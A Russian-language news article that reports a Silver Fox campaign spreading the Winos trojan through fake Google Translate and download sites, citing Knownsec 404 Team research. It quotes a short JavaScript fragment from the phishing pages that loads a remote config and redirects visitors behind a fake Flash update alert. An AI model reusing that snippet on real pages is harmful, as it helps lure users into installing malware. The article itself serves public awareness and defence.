Хакеры Silver Fox прячут троян Winos в поддельном Google Переводчике

Группировка Silver Fox нашла новый способ заражать компьютеры под Windows: она создаёт точные копии популярных онлайн-инструментов — в первую очередь Google Переводчика — и раздаёт через них троян Winos. Кампанию обнаружили исследователи из Knownsec 404 Team; по их данным, группировка активна с 2024 года и постоянно меняет тактику социальной инженерии.

Как устроена ловушка

Атакующие поднимают фальшивые сайты, копирующие интерфейс Google Переводчика, конвертеров валют и страниц загрузки популярных программ — например, WPS Office. Как только пользователь взаимодействует с такой страницей, ему показывают поддельное уведомление об устаревшей версии Flash Player, которое ведёт на сервер злоумышленников с вредоносным установочным пакетом.

Технически всё реализовано аккуратно: на фишинговых сайтах внедрён JavaScript-код, который создаёт скрытые поля ввода и подтягивает конфигурацию из удалённого JSON-файла, прежде чем показать фальшивое окно обновления. Вот фрагмент такого скрипта:

fetch('url.json')
.then(response => response.json())
.then(data => {
    const urlToUse = data[0];
    document.body.addEventListener('click', function() {
        alert("检测Flash版本过低,请安装后插件重试!");
    });
    window.location.href = urlToUse;
});

Текст всплывающего окна на китайском языке переводится как «Обнаружена устаревшая версия Flash, установите плагин и повторите попытку», что указывает на ориентацию кампании (как минимум частично) на китаеязычную аудиторию.

Что делает вредонос после установки

После запуска установщика на систему разворачивается набор компонентов, включая файлы javaw.exe и Microsoftdata.exe — названия подобраны так, чтобы имитировать легитимное ПО Microsoft. Сам троян Winos обладает полноценным набором функций для кражи данных: делает скриншоты, ведёт кейлоггинг и отслеживает содержимое буфера обмена.

Закрепление в системе достигается через модификацию реестра — вредонос прописывает себя в автозагрузку Windows, обеспечивая себе устойчивость после перезагрузок.

При анализе финальной полезной нагрузки исследователи обнаружили в базе данных программы упоминание «RexRat4.0.3». Это говорит о том, что злоумышленники используют коммерчески доступный инструмент удалённого доступа, переработанный под нужды киберпреступной кампании.

Почему это тревожно

Кампания Silver Fox — ещё одно подтверждение тенденции, о которой всё чаще предупреждают специалисты: злоумышленники всё реже эксплуатируют технические уязвимости, делая ставку на социальную инженерию и доверие пользователей к знакомым сервисам. Именно поэтому обучение сотрудников и внимательность при загрузке «обновлений плагинов» с непроверенных сайтов остаются одной из главных линий защиты — техническими средствами такие атаки перехватываются далеко не всегда.

Источник: Cybersecurity News.